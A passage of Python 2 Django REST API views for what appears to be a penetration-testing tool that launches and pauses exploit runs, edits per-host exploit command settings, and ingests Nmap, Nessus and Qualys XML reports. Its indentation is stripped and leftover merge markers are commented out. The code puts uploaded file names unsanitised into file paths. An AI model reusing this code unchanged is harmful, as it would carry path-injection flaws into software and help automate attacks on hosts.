my_obj.Update_status_to_paused_or_processing(scan_attributes.data["project_id"],'processing',True,False)
return_response["status"]="success" #+str(scan_attributes.data["project_name"])
return_response["project_id"]=scan_attributes.data["project_id"]
return_response["value"]=scan_attributes.data["project_id"]
return Response(JSONRenderer().render(return_response))
else:
return_response["status"]="failure" #+str(scan_attributes.data["project_name"])
return_response["errors"]="Scan can not be started.Some error occured"
return_response["value"]="Scan status could not be fetched !!!"
return Response(JSONRenderer().render(return_response))
scan_id=obj.main_resume(scan_attributes.data["project_id"],'','',True)
if scan_id !=-1:
my_obj.Update_status_to_paused_or_processing(scan_attributes.data["project_id"],'processing',True,True)
return_response["status"]="success" #+str(scan_attributes.data["project_name"])
return_response["project_id"]=str(scan_id)
return_response["value"]=str(scan_id)
return Response(JSONRenderer().render(return_response))
else:
return_response["status"]="failure" #+str(scan_attributes.data["project_name"])
return_response["errors"]="Scan can not be started.Some error occured"
return_response["value"]="Some error occured and scan did not start"
return Response(JSONRenderer().render(return_response))
else:
return_response["status"]="failure"
return_response["errors"]=scan_attributes.errors
return_response["value"]=scan_attributes.errors
return Response(JSONRenderer().render(return_response))
except Exception ,ee:
return_response["status"]="failure"
return_response["errors"]=str(ee)
return_response["value"]=str(ee)
return Response(JSONRenderer().render(return_response))
class StopExploits(APIView):
"""
Objective :
The objective of this class is to serve the Post method which would take the scan/project id
and would invoke appropriate backend python files Gui_main_driver.py to stop the vulnerability scan
In order to understand about input given to this method and response returned read API documentation.
"""
#@csrf_exempt
def post(self,request,format=None):
try:
return_response={}
scan_attributes=General(data=request.data)
if scan_attributes.is_valid():
#return Response(scan_attributes.data)
try:
concurrent=request.data["concurrent"]
except Exception ,ex:
return_response["status"]="failure"
return_response["errors"]="Required Concurrent Field"
return_response["value"]="Required Concurrent Field"
return Response(JSONRenderer().render(return_response))
obj=Gui_main_driver.Gui_main()
scan_id=obj.exploits_pause(scan_attributes.data["project_id"],concurrent)
return_response["status"]="success" #+str(scan_attributes.data["project_name"])
return_response["response_code"]=str(scan_id)
return_response["value"]=str(scan_id)
return Response(JSONRenderer().render(return_response))
return_response["status"]="failure"
return_response["errors"]=scan_attributes.errors
return_response["value"]=scan_attributes.errors
return Response(JSONRenderer().render(return_response))
except Exception ,ee:
return_response["status"]="failure"
return_response["errors"]=str(ee)
return_response["value"]=str(ee)
return Response(JSONRenderer().render(return_response))
class ResumeScan(APIView):
"""
Objective :
The objective of this class is to serve the Post method which would take the scan/project id
and would invoke appropriate backend python files Gui_main_driver.py to resume the scan.
In order to understand about input given to this method and response returned read API documentation.
"""
#@csrf_exempt
def post(self,request,format=None):
scan_attributes=General(data=request.data)
return_response={}
if scan_attributes.is_valid():
#return Response(scan_attributes.data)
obj=Gui_main_driver.Gui_main()
scan_id=obj.main_resume(scan_attributes.data["project_id"],'','')
if scan_id != -1:
my_obj=IPtable.IPtable()
my_obj.Update_status_to_paused_or_processing(scan_id,'processing')
return_response["status"]="success" #+str(scan_attributes.data["project_name"])
return_response["project_id"]=str(scan_id)
return_response["value"]=str(scan_id)
return Response(JSONRenderer().render(return_response))
else:
return_response["status"]="failure" #+str(scan_attributes.data["project_name"])
return_response["errors"]="Some exception occured ,Cant resume project"
return_response["value"]="Some exception occured,Cant resume project"
return Response(JSONRenderer().render(return_response))
return_response["status"]="failure"
return_response["errors"]=scan_attributes.errors
return_response["value"]=scan_attributes.errors
return Response(JSONRenderer().render(return_response))
class ResumeExploits(APIView):
"""
Objective :
The objective of this class is to serve the Post method which would take the scan/project id
and would invoke appropriate backend python files Gui_main_driver.py to resume the vul scan
In order to understand about input given to this method and response returned read API documentation.
"""
#@csrf_exempt
def post(self,request,format=None):
try:
scan_attributes=General(data=request.data)
return_response={}
if scan_attributes.is_valid():
#return Response(scan_attributes.data)
obj=Gui_main_driver.Gui_main()
exploit_status=obj.exploits_resume(scan_attributes.data["project_id"])
if exploit_status["status"]=="success":
my_obj=IPtable.IPtable()
my_obj.Update_status_to_paused_or_processing(scan_attributes.data["project_id"],'processing',True)
return_response["status"]="success" #+str(scan_attributes.data["project_name"])
return_response["project_id"]=str(scan_attributes.data["project_id"])
return_response["value"]=str(scan_attributes.data["project_id"])
return Response(JSONRenderer().render(return_response))
return_response["status"]="failure"
return_response["errors"]=scan_attributes.errors
return_response["value"]=scan_attributes.errors
return Response(JSONRenderer().render(return_response))
except Exception ,ee:
return_response["status"]="failure"
return_response["errors"]=str(ee)
return_response["value"]=str(ee)
return Response(JSONRenderer().render(return_response))
class ProjectStatus(APIView):
def get(self,request,format=None):
try:
obj=IPtable.Projects()
to_validate=General(data=request.data)
if to_validate.is_valid():
data=obj.fetch_project_status(to_validate.data["project_id"])
return Response(JSONRenderer().render(data))
except Exception ,ee:
resp_text={}
resp_text["status"]="failure"
resp_text["value"]=str(ee)
return Response(JSONRenderer().render(resp_text))
class ExploitableProjects(APIView):
"""
Objective :
The objective of this class is to serve the Post method which would return the project id's of the
projects for which the discovery would be over and would be eligible for vulnerability scan
In order to understand about input given to this method and response returned read API documentation.
"""
def get(self,request,format=None):
try:
paused=request.data["paused"]
obj=IPtable.Projects()
if paused==True:
projects=obj.completed_projects(None,True)
else:
projects=obj.completed_projects()
project_list=[]
for project in projects:
#print str(project[0])+ " " +str(project[1])
project_dict={}
project_dict["id"]=project[0]
project_dict["name"]=project[1]
project_dict["project_status"]=project[2]
project_dict["project_status_exploits"]=project[3]
project_dict["mode"]=project[4]
#,mode,Date,IPrange,Port_range,switch
project_dict["Date"]=str(project[5]).split()[0]
project_dict["Time"]=str(project[5]).split()[1]
project_dict["IPrange"]=project[6]
project_dict["port_range"]=project[7]
project_dict["switch"]=project[8]
project_list.append(project_dict)
#print "\n\n\n My val is --->"+str(project_list)
return_response={}
if 1:#serialize.is_valid():
return_response["status"]="success"
#return_response["data"]=serialize.data
return_response["data"]=project_list
return Response(JSONRenderer().render(return_response))
except Exception ,ee:
return_response={}
return_response["status"]="failure"
return_response["errors"]=str(ee)
return_response["value"]=str(ee)
return Response(JSONRenderer().render(return_response))
class ExploitConfig_overwrite(APIView):
"""
Objective :
The objective of this class is to serve the Post method which would take the updated configuration
for a project and would delete the old configuration and results and would update to default
configuration .Thus invoking the file Gui_main_driver.py for the method updateDefaultconfiguration()
In order to understand about input given to this method and response returned read API documentation.
"""
def configure_response(self,default_config):
#<<<<<<< HEAD
#print "IN configure response !"
#=======
#print "IN configure response !"
#>>>>>>> b6b8e9ee72399e3d683c7808a85d7f1c8ce3cbf6
config_list=[]
config_dict={}
return_val=[]
for config in default_config["value"]:
#<<<<<<< HEAD
#print str(config)
#=======
#print str(config)
#>>>>>>> b6b8e9ee72399e3d683c7808a85d7f1c8ce3cbf6
config_dict={}
#print str(project[0])+ " " +str(project[1])
config_dict["id"]=config[0]
config_dict["project_id"]=config[1]
config_dict["host"]=config[2]
config_dict["port"]=config[3]
config_dict["service"]=config[4]
config_dict["project_status"]=config[5]
config_dict["Commands"]=config[6]
config_dict["reconfig_service"]=False
config_dict["reconfig_exploit"]=False
if len(config)> 7:
config_dict["service_type"]=config[7]
if len(config)>8:
config_dict["state"]=config[8]
config_dict["version"]=config[9]
if len(config) >9:
config_dict["test_case"]=config[10]
config_list.append(config_dict)
return_val.append(config_dict)
return_val.append(config_list)
return return_val
def post(self,request,format=None):
#<<<<<<< HEAD
#print "\n\n IN post method of config overwrite !!!"
#=======
#print "\n\n IN post method of config overwrite !!!"
#>>>>>>> b6b8e9ee72399e3d683c7808a85d7f1c8ce3cbf6
obj=Gui_main_driver.Gui_main()
project_id=request.data["project_id"]
continue_=False
delete=True
default_config=obj.Overwrite_and_GetDefaultConfiguration(project_id,'','',continue_,delete,False)
if default_config["status"]=="reconfig":
resp=self.configure_response(default_config)
config_dict=resp[0]
config_list=resp[1]
#print "\n\n\n"+str(project_list)
return_response={}
if 1:#serialize.is_valid():
return_response["status"]="success"
#return_response["data"]=serialize.data #Note Both work the same !!!
return_response["data"]=config_list#serialize.data #Thus while reteriving data we can simply send back query list to json data !!.No need to build wrapper
else:
return_response["status"]="failure"
return_response["errors"]=serialize.errors
return_response["value"]=serialize.errors
return Response(JSONRenderer().render(return_response))
else:
#<<<<<<< HEAD
#print "\n\nReturning default config \n\n"
#=======
#print "\n\nReturning default config \n\n"
#>>>>>>> b6b8e9ee72399e3d683c7808a85d7f1c8ce3cbf6
return Response(JSONRenderer().render(default_config))
class AddTestCase(APIView):
def post(self,request,format=None):
#<<<<<<< HEAD
#print "hello world !!"
#=======
#print "hello world !!"
#>>>>>>> b6b8e9ee72399e3d683c7808a85d7f1c8ce3cbf6
return_response={}
all_values=[]
obj=Gui_main_driver.Gui_main()
try:
project_id=request.data["project_id"]
data_=Configuration(data=request.data["data"],many=True)
concurrent=request.data["concurrent"]
except Exception ,ee:
return_response["status"]="failure"
return_response["errors"]=str(ee)
return_response["value"]="Error message is -->"+str(ee)
return Response(JSONRenderer().render(return_response))
try:
if data_.is_valid(): #list of dictionaries with each dictionary contains list of dict
#<<<<<<< HEAD
#print "Project id is : "+str(project_id)
continue_=False
delete=False
#print str(all_values)
#print "Concurrent value is :"+str(concurrent)
#=======
#print "Project id is : "+str(project_id)
continue_=False
delete=False
#print str(all_values)
#print "Concurrent value is :"+str(concurrent)
#>>>>>>> b6b8e9ee72399e3d683c7808a85d7f1c8ce3cbf6
if concurrent =="0":
update_result=obj.InsertDefaultconfiguration(data_.data,project_id)
elif concurrent=="1":
update_result=obj.InsertDefaultconfiguration(data_.data,project_id,'','',True)
#print "The length of elements returned :"+str(len(update_result))
#print "\n\nObtained result is :" +str(update_result)
return_response["status"]="success"
return_response["value"]=update_result[0] #tedupdate status of services
return_response["data"]=update_result[1] #the list of updated services
else:
return_response["status"]="failure"
return_response["value"]="Error message is :"+str(data_.errors)
return_response["errors"]=data_.errors
except Exception ,ee:
return_response["status"]="failure"
return_response["errors"]=str(ee)
return_response["value"]="Error message is :"+str(ee)
return Response(JSONRenderer().render(return_response))
return Response(JSONRenderer().render(return_response))
class ExploitConfig(APIView):
"""
Objective :
The objective of this class is to serve the Post method which would take the updated configuration
for a project and would update the configuration .Thus invoking the file Gui_main_driver.py for the
method updateDefaultconfiguration().Finally it will return the updated configuration
In order to understand about input given to this method and response returned read API documentation.
"""
def post(self,request,format=None):
#<<<<<<< HEAD
#print "hello world !!"
#=======
#print "hello world !!"
#>>>>>>> b6b8e9ee72399e3d683c7808a85d7f1c8ce3cbf6
return_response={}
all_values=[]
obj=Gui_main_driver.Gui_main()
try:
concurrent=request.data["concurrent"]
project_id=request.data["project_id"]
data_=Configuration(data=request.data["data"],many=True) #it transforms the underlying dictionary to ordered dictionary which is nothing but cololection of tuples.It does that recursively
#data_=test_multi(data=request.data["data"],many=True)
except Exception ,ee:
return_response["status"]="failure"
return_response["errors"]=str(ee)
return_response["value"]="Error message is -->"+str(ee)
return Response(JSONRenderer().render(return_response))
try:
if data_.is_valid(): #list of dictionaries with each dictionary contains list of dict
#<<<<<<< HEAD
#print "Project id is : "+str(project_id)
continue_=False
delete=False
#print str(all_values)
#=======
#print "Project id is : "+str(project_id)
continue_=False
delete=False
#print str(all_values)
#>>>>>>> b6b8e9ee72399e3d683c7808a85d7f1c8ce3cbf6
if concurrent =="0":
update_result=obj.updateDefaultconfiguration(data_.data,project_id)
elif concurrent=="1":
update_result=obj.updateDefaultconfiguration(data_.data,project_id,'','',True)
#<<<<<<< HEAD
#print "The length of elements returned :"+str(len(update_result))
#=======
#print "The length of elements returned :"+str(len(update_result))
#>>>>>>> b6b8e9ee72399e3d683c7808a85d7f1c8ce3cbf6
#print "\n\nObtained result is :" +str(update_result)
return_response["status"]="success"
return_response["value"]=update_result[0] #tedupdate status of services
return_response["data"]=update_result[1] #the list of updated services
else:
return_response["status"]="failure"
return_response["value"]="Error message is :"+str(data_.errors)
return_response["errors"]=data_.errors
except Exception ,ee:
return_response["status"]="failure"
return_response["errors"]=str(ee)
return_response["value"]="Error message is :"+str(ee)
return Response(JSONRenderer().render(return_response))
return Response(JSONRenderer().render(return_response))
def configure_response(self,default_config):
#<<<<<<< HEAD
#print "IN configure response !"
#=======
#print "IN configure response !"
#>>>>>>> b6b8e9ee72399e3d683c7808a85d7f1c8ce3cbf6
config_list=[]
config_dict={}
return_val=[]
for config in default_config["value"]:
#print str(config)
config_dict={}
#print str(project[0])+ " " +str(project[1])
config_dict["id"]=config[0]
config_dict["project_id"]=config[1]
config_dict["host"]=config[2]
config_dict["port"]=config[3]
config_dict["service"]=config[4]
config_dict["project_status"]=config[5]
config_dict["Commands"]=config[6]
config_dict["reconfig_service"]=False
config_dict["reconfig_exploit"]=False
if len(config)> 7:
config_dict["service_type"]=config[7]
if len(config)>8:
config_dict["state"]=config[8]
config_dict["version"]=config[9]
if len(config) >9:
config_dict["test_case"]=config[10]
config_list.append(config_dict)
return_val.append(config_dict)
return_val.append(config_list)
return return_val
def get(self,request,format=None):
obj=Gui_main_driver.Gui_main()
project_id=request.data["project_id"]
continue_=False
delete=False
default_config=obj.getDefaultConfiguration(project_id,continue_,delete,False)
if default_config["status"]=="reconfig":
resp=self.configure_response(default_config)
config_dict=resp[0]
config_list=resp[1]
#print "\n\n\n"+str(project_list)
return_response={}
try:
#<<<<<<< HEAD
print "Reached here in TRy"
#=======
#print "Reached here"
#>>>>>>> b6b8e9ee72399e3d683c7808a85d7f1c8ce3cbf6
#serialize=Configuration(data=config_dict)
#print "\n\n\nseturnrializers are :"+str(serialize)+"\n\n"
except Exception ,ee :
print "EXception " +str(ee)
return_response["status"]="failure"
return_response["errors"]=str(ee)
return_response["value"]=str(ee)
return Response(JSONRenderer().render(return_response))
if 1:#serialize.is_valid():
return_response["status"]="success"
#return_response["data"]=serialize.data #Note Both work the same !!!
return_response["data"]=config_list#serialize.data #Thus while reteriving data we can simply send back query list to json data !!.No need to build wrapper
else:
return_response["status"]="failure"
return_response["errors"]=serialize.errors
return_response["value"]=serialize.errors
return Response(JSONRenderer().render(return_response))
else:
#<<<<<<< HEAD
#print "\n\nReturning default config \n\n"
#=======
#print "\n\nReturning default config \n\n"
#>>>>>>> b6b8e9ee72399e3d683c7808a85d7f1c8ce3cbf6
return Response(JSONRenderer().render(default_config))
class LaunchExploits(APIView):
"""
Objective :
The objective of this class is to serve the Post method which would take the project id as input and
would start vulneraibility scanning for the obtained project id.
It invokes Gui_main_driver.py file to start vulneribility scanning.
In order to understand about input given to this method and response returned read API documentation.
"""
def post(self,request,format=None):
try:
self.project_obj=IPtable.Projects()
obj=Gui_main_driver.Gui_main()
exploit_data=Exploits(data=request.data)
return_response={}
if(exploit_data.is_valid()):
project_id=exploit_data.data["project_id"]
continue_=True
delete=False
get_default_config=False
threading=exploit_data.data["threading"]
result=self.project_obj.completed_projects(int(project_id))
if result[0] > 0:
exploit_status=obj.LaunchExploits(project_id,continue_,delete,get_default_config,threading)
if exploit_status["status"]=="success":
my_obj=IPtable.IPtable()
my_obj.Update_status_to_paused_or_processing(project_id,'processing',True)
return_response["status"]=exploit_status["status"]
return_response["value"]=exploit_status["value"]
else:
return_response["status"]="failure"
return_response["value"]="In valid project id ."
else:
return_response["status"]="failure"
return_response["errors"]=exploit_data.errors
return_response["value"]=exploit_data.errors
return Response(JSONRenderer().render(return_response))
except Exception,ee:
return_response={}
return_response["status"]="failure"
return_response["value"]=str(ee)
return Response(JSONRenderer().render(return_response))
class LaunchExploitsConcurrent(APIView):
"""
Objective :
The objective of this class is to serve the Post method which would take the project id as input and
would start vulneraibility scanning for the obtained project id.
It invokes Gui_main_driver.py file to start vulneribility scanning in concurrent mode.
In order to understand about input given to this method and response returned read API documentation.
"""
def post(self,request,format=None):
try:
obj=Gui_main_driver.Gui_main()
exploit_data=ExploitsConcurrent(data=request.data)
return_response={}
if(exploit_data.is_valid()):
project_id=exploit_data.data["project_id"]
continue_=True
delete=False
get_default_config=False
threading=exploit_data.data["threading"]
if threading==True:
threading=False
rec_list=exploit_data.data["record_list"]
exploit_status=obj.LaunchExploits(project_id,continue_,delete,get_default_config,False,True,rec_list)
return_response["status"]=exploit_status["status"]
return_response["value"]=exploit_status["value"]
else:
return_response["status"]="failure"
return_response["errors"]=exploit_data.errors
return_response["value"]=exploit_data.errors
return Response(JSONRenderer().render(return_response))
except Exception,ee:
return_response={}
return_response["status"]="failure"
return_response["value"]=str(ee)
return Response(JSONRenderer().render(return_response))
class DownloadAllMannual(APIView):
"""
Objective :
The objective of this class is to serve the Post method which would take the project id as input and
would return a zipped folder containing all the reports, pcap files and etc.
In order to understand about input given to this method and response returned read API documentation.
"""
def __init__(self):
self.folder_dir=os.path.dirname(os.path.realpath(__file__))
self.results_path=os.path.join(self.folder_dir,"Results")
self.folder_name=os.path.join(self.results_path,"Data_")
self.All_Json=os.path.join(self.folder_dir,"all_commands.json")
self.Master_Json=os.path.join(self.folder_dir,"Master.json")
self.Mandatory_Json=os.path.join(self.folder_dir,"Mandatory.json")
self.Analytical_Json=os.path.join(self.folder_dir,"Analytical.json")
def zipdir(self,path,ziph):
for dirname,subdirs,files in os.walk(path):
abs_path_dir=dirname
rel_path_dir=abs_path_dir[len(path)+len(os.sep):]
#<<<<<<< HEAD
#print "ADd dir is :"+str(rel_path_dir)
#=======
#print "ADd dir is :"+str(rel_path_dir)
#>>>>>>> b6b8e9ee72399e3d683c7808a85d7f1c8ce3cbf6
for file_ in files:
abs_path=os.path.join(dirname,file_)
rel_path=abs_path[len(path)+len(os.sep):]
ziph.write(abs_path,rel_path)
def init_project_directory(self,project_id):
#print "Initialising parent directory "
try:
if not os.path.exists(self.folder_name+str(project_id)):
return -1
return 1;
except Exception ,ee:
#self.print_Error("Error while creating directory !!"+str(ee))
print "EX "+str(ee)
return -1
def post(self,request,format=None):
self.project_obj=IPtable.Projects()
try:
return_response={}
to_validate=General(data=request.data)
if to_validate.is_valid():
#<<<<<<< HEAD
#print str(to_validate.data)
#=======
#print str(to_validate.data)
#>>>>>>> b6b8e9ee72399e3d683c7808a85d7f1c8ce3cbf6
project_id=to_validate.data["project_id"]
result=self.project_obj.completed_projects(int(project_id))
print "Result is : " +str(result)
if result[0] > 0:
status=self.init_project_directory(project_id)
print "status is : "+str(status)
if status != -1:
my_obj=IPexploits.IPexploits()
my_obj.data_path=self.folder_name+str(project_id)
my_obj.generate_report(project_id)
self.data_path=self.folder_name+str(project_id)
zip_folder_name="Data_"+str(project_id)+".zip"
zip_folder_creation_path=os.path.join(self.results_path,zip_folder_name)
zip_folder_path=self.data_path #file to be zipped
zipf=zipfile.ZipFile(zip_folder_creation_path,'w',zipfile.ZIP_DEFLATED)
self.zipdir(zip_folder_path,zipf)
zipf.close()
zip_file=open(zip_folder_creation_path,'rb')
resp=HttpResponse(FileWrapper(zip_file),content_type="application/zip")
resp['content-Disposition']='attachment;filename="%s"'%'text.zip'
return resp
else:
return_response["status"]="failure"
return_response["value"]="No data is present for the given project id :"
else:
return_response["status"]="failure"
return_response["value"]="In valid project id ."
else:
return_response["status"]="failure"
return_response["value"]=to_validate.errors
return Response(JSONRenderer().render(return_response))
except Exception ,ee:
print "Exception ! " +str(ee)
return_response={}
return_response["status"]="failure"
return_response["value"]=str(ee)
return Response(JSONRenderer().render(return_response))
class MergeReports(APIView):
"""
Objective :
The objective of this class is to serve the Post method which would take the project id as input and
would return a zipped folder containing the merged qualys ,nessus and mannual vul scanning report.
In order to understand about input given to this method and response returned read API documentation.
"""
def post(self,request,format=None):
obj=Report_orchestration.Report_merger(True,True)
self.project_obj=IPtable.Projects()
try:
return_response={}
to_validate=Merge_reports(data=request.data)
if to_validate.is_valid():
#<<<<<<< HEAD
#print str(to_validate.data)
#=======
#print str(to_validate.data)
#>>>>>>> b6b8e9ee72399e3d683c7808a85d7f1c8ce3cbf6
project_id=to_validate.data["project_id"]
format_=to_validate.data["report_format"]
#obj=Report_merger(True,True)
result=self.project_obj.completed_projects(int(project_id))
if result[0] > 0:
resp=obj.generate_report(int(project_id),format_)
if resp["status"]=="success":
return_response["status"]="success"
return_response["value"]=resp["value"]
zip_file=open(resp["value"],'rb')
resp=HttpResponse(FileWrapper(zip_file),content_type="application/zip")
resp['content-Disposition']='attachment;filename="%s"'%'result.zip'
return resp
else:
return_response["status"]="failure"
return_response["value"]=resp["value"]
else:
return_response["status"]="failure"
return_response["value"]="In valid project id ."
else:
return_response["status"]="failure"
return_response["value"]=to_validate.errors
return Response(JSONRenderer().render(return_response))
except Exception ,ee:
return_response={}
return_response["status"]="failure"
return_response["value"]=str(ee)
return Response(JSONRenderer().render(return_response))
class UploadQualysXml(APIView):
"""
Objective :
The objective of this class is to serve the Post method which would take the qualys xml report and
would parse it and store it in database table.
In order to understand about input given to this method and response returned read API documentation.
"""
parser_classes=(MultiPartParser,)
def post(self,request,format=None):
try:
#<<<<<<< HEAD
#print "Inside Qualys XML :"
#=======
#print "Inside Qualys XML :"
#>>>>>>> b6b8e9ee72399e3d683c7808a85d7f1c8ce3cbf6
to_validate=UploadXml(data=request.data)
return_response={}
if to_validate.is_valid():
file_obj=request.FILES['filename']
F_validator=FileValidator.FileValidator()
is_xml=F_validator.validateXML(file_obj)
if is_xml:
#print "Validation results are :-->" +str(is_xml)
#<<<<<<< HEAD
#print str(file_obj.name)
#=======
#print str(file_obj.name)
#>>>>>> b6b8e9ee72399e3d683c7808a85d7f1c8ce3cbf6
folder_dir=os.path.dirname(os.path.realpath(__file__))
results_path=os.path.join(folder_dir,"XML_reports")
un_id=uuid.uuid1()
pid=to_validate.data["project_name"]
xml_file_name=str(file_obj.name)+"_pid:"+str(pid)+"_uid:"+str(un_id)+".xml"
xml_file_path=os.path.join(results_path,xml_file_name)
with open (xml_file_path,'wb') as out_file:
for chunks in file_obj.chunks():
out_file.write(chunks)
#<<<<<<< HEAD
#print "uploaded File :--> "+str(xml_file_path)
#=======
#print "uploaded File :--> "+str(xml_file_path)
#>>>>>>> b6b8e9ee72399e3d683c7808a85d7f1c8ce3cbf6
qualys=Qualys_parser.QualysParser()
qualys_results=None
val=qualys.parse(xml_file_path,int(pid))
if val["status"]=="success":
return_response["status"]="success"
return_response["value"]=str(pid)
else:
return_response["status"]="failure"
return_response["value"]=str(val["value"])
os.remove(xml_file_path)
#<<<<<<< HEAD
#print "File removed"
#=======
#print "File removed"
#>>>>>>> b6b8e9ee72399e3d683c7808a85d7f1c8ce3cbf6
else:
return_response["status"]="failure"
return_response["value"]="Supplied file was not XML ,only XML type accepted"
else:
return_response["status"]="failure"
return_response["value"]=to_validate.errors
return Response(JSONRenderer().render(return_response))
except Exception ,ee:
return_response={}
return_response["status"]="failure"
return_response["value"]=str(ee)
return Response(JSONRenderer().render(return_response))
class ReportOnFly(APIView):
"""
Objective :
The objective of this class is to serve the Post method which would take either qualys or nessus
report as input at one time and would parse the report and map cve's with exploits and would
return final copy of integrated report in the format chosen by user.
In order to understand about input given to this method and response returned read API documentation.
"""
parser_classes=(MultiPartParser,)
def post(self,request,format=None):
try:
to_validate=OnFly(data=request.data)
return_response={}
if to_validate.is_valid():
file_obj=request.FILES['filename']
F_validator=FileValidator.FileValidator()
is_xml=F_validator.validateXML(file_obj)
if is_xml:
valid=["nessus","qualys"]
if (to_validate.data["source"] not in valid):
return_response["status"]="failure"
return_response["value"]="The source of report must be either qualys or nessus"
return Response(JSONRenderer().render(return_response))
#<<<<<<< HEAD
#print str(file_obj.name)
#=======
#print str(file_obj.name)
#>>>>>>> b6b8e9ee72399e3d683c7808a85d7f1c8ce3cbf6
folder_dir=os.path.dirname(os.path.realpath(__file__))
results_path=os.path.join(folder_dir,"XML_reports")
un_id=uuid.uuid1()
xml_file_name=str(file_obj.name)+"_uid:"+str(un_id)+".xml"
xml_file_path=os.path.join(results_path,xml_file_name)
with open (xml_file_path,'wb') as out_file:
for chunks in file_obj.chunks():
out_file.write(chunks)
#<<<<<<< HEAD
#print "uploaded File -"+str(xml_file_path)
#=======
#print "uploaded File -"+str(xml_file_path)
#>>>>>> b6b8e9ee72399e3d683c7808a85d7f1c8ce3cbf6
if to_validate.data["source"]=="nessus":
obj=Exploit_mapping.Exploit_mapping(xml_file_path)
else:
obj=Exploit_mapping.Exploit_mapping('',xml_file_path)
val=obj.generate_report(to_validate.data["report_format"])
os.remove(xml_file_path)
if val["status"]=="success":
#<<<<<<< HEAD
#print "Success reutrned"
#=======
#print "Success reutrned"
#>>>>>>> b6b8e9ee72399e3d683c7808a85d7f1c8ce3cbf6
return_response["status"]="success"
return_response["value"]=val["value"]
zip_file=open(val["value"],'rb')
resp=HttpResponse(FileWrapper(zip_file),content_type="application/zip")
resp['content-Disposition']='attachment;filename="%s"'%'Report.zip'
return resp
else:
return_response["status"]="failure"
return_response["value"]=str(val["value"])
else:
return_response["status"]="failure"
return_response["value"]="Supplied file was not XML ,only XML type accepted"
else:
return_response["status"]="failure"
return_response["value"]=to_validate.errors
return Response(JSONRenderer().render(return_response))
except Exception ,ee:
print "Inside exception :"+str(ee)
return_response={}
return_response["status"]="failure"
return_response["value"]=str(ee)
return Response(JSONRenderer().render(return_response))
#return Response(status=204)
class UploadNessusXml(APIView):
"""
Objective :
The objective of this class is to serve the Post method which would take the nessus xml report and
would parse it and store it in database table.
In order to understand about input given to this method and response returned read API documentation.
"""
parser_classes=(MultiPartParser,)
def post(self,request,format=None):
try:
to_validate=UploadXml(data=request.data)
return_response={}
if to_validate.is_valid():
file_obj=request.FILES['filename']
F_validator=FileValidator.FileValidator()
is_xml=F_validator.validateXML(file_obj)
if is_xml:
#print "Validation results are :-->" +str(is_xml)
#<<<<<<< HEAD
#print str(file_obj.name)
#=======
#print str(file_obj.name)
#>>>>>>> b6b8e9ee72399e3d683c7808a85d7f1c8ce3cbf6
folder_dir=os.path.dirname(os.path.realpath(__file__))
results_path=os.path.join(folder_dir,"XML_reports")
un_id=uuid.uuid1()
pid=to_validate.data["project_name"]
xml_file_name=str(file_obj.name)+"_pid:"+str(pid)+"_uid:"+str(un_id)+".nessus"
xml_file_path=os.path.join(results_path,xml_file_name)
with open (xml_file_path,'wb') as out_file:
for chunks in file_obj.chunks():
out_file.write(chunks)
#<<<<<<< HEAD
#print "uploaded File -"+str(xml_file_path)
#=======
#print "uploaded File -"+str(xml_file_path)
#>>>>>>> b6b8e9ee72399e3d683c7808a85d7f1c8ce3cbf6
nessus=Nessus_parser.Nessus_Parser()
nessus_results=None # ('m.nessus','0','',"return"))
val=nessus.parse(xml_file_path,int(pid))
if val["status"]=="success":
return_response["status"]="success"
return_response["value"]=str(pid)
else:
return_response["status"]="failure"
return_response["value"]=str(val["value"])
os.remove(xml_file_path)
#<<<<<<< HEAD
#print "File removed"
#=======
#print "File removed"
#>>>>>>> b6b8e9ee72399e3d683c7808a85d7f1c8ce3cbf6
else:
return_response["status"]="failure"
return_response["value"]="Supplied file was not XML ,only XML type accepted"
else:
return_response["status"]="failure"
return_response["value"]=to_validate.errors
return Response(JSONRenderer().render(return_response))
except Exception ,ee:
return_response={}
return_response["status"]="failure"
return_response["value"]=str(ee)
return Response(JSONRenderer().render(return_response))
#return Response(status=204)
class UploadNmapXml(APIView):
"""
Objective :
The objective of this class is to serve the Post method which would take the nmap xml report and
would parse it and store it in database table.
In order to understand about input given to this method and response returned read API documentation.
"""
parser_classes=(MultiPartParser,)
def post(self,request,format=None):
try:
IPtable_obj=IPtable.IPtable()
to_validate=UploadXmlNmap(data=request.data)
return_response={}
if to_validate.is_valid():
file_obj=request.FILES['filename']
F_validator=FileValidator.FileValidator()
is_xml=F_validator.validateXML(file_obj)
if is_xml:
folder_dir=os.path.dirname(os.path.realpath(__file__))
results_path=os.path.join(folder_dir,"XML_reports")
pid=IPtable_obj.Insert(to_validate.data["project_name"],'import',str(file_obj.name))
IPtable_obj.update_mapping(to_validate.data["app_id"],int(pid),to_validate.data["assessment_id"])
if (pid==-1):
return_response["status"]="failure"
return_response["value"]="Some error occured while inserting details"
return Response(JSONRenderer().render(return_response))
xml_file_name=str(file_obj.name)+"_"+str(pid)
xml_file_path=os.path.join(results_path,xml_file_name)
with open (xml_file_path,'wb') as out_file:
for chunks in file_obj.chunks():
out_file.write(chunks)
val=nmap_parser.Import('gui',xml_file_path,to_validate.data["project_name"],pid)
if val["status"]=="success":
return_response["status"]="success"
return_response["value"]=str(pid)
my_obj=IPtable.IPtable()
my_obj.Update_status_to_paused_or_processing(pid,'complete')
else:
return_response["status"]="failure"
return_response["value"]=str(val["value"])
else:
return_response["status"]="failure"
return_response["value"]="Supplied file was not XML ,only XML type accepted"
else:
return_response["status"]="failure"
return_response["value"]=to_validate.errors
return Response(JSONRenderer().render(return_response))
except Exception ,ee:
return_response={}
return_response["status"]="failure"
return_response["value"]=str(ee)
return Response(JSONRenderer().render(return_response))
class Reconfigure():
"""
Objective :
The objective of this class is to help in reconfiguration of the input given by user for
updating configuration.It does not interact with the web service directly.
In order to understand about input given to this method and response returned read API
documentation.
"""
def configure_response(self,default_config):
config_list=[]
config_dict={}
record_list=[]
return_val=[]
for config in default_config["value"]:
#print str(config)
config_dict={}
#print str(project[0])+ " " +str(project[1])
config_dict["id"]=config[0]
record_list.append(config[0])
config_dict["project_id"]=config[1]
config_dict["host"]=config[2]
config_dict["port"]=config[3]
config_dict["service"]=config[4]
config_dict["project_status"]=config[5]
config_dict["Commands"]=config[6]
config_dict["reconfig_service"]=False
config_dict["reconfig_exploit"]=False
if len(config)> 7:
config_dict["service_type"]=config[7]
if len(config)>8:
config_dict["state"]=config[8]
config_dict["version"]=config[9]
if len(config) >9:
config_dict["test_case"]=config[10]
config_list.append(config_dict)
return_val.append(config_dict)
return_val.append(config_list)
return_val.append(record_list)
return return_val
class PollingConfig(APIView):
"""
Objective :
The objective of this class is to serve the Post-Get methods which would take the project id and would
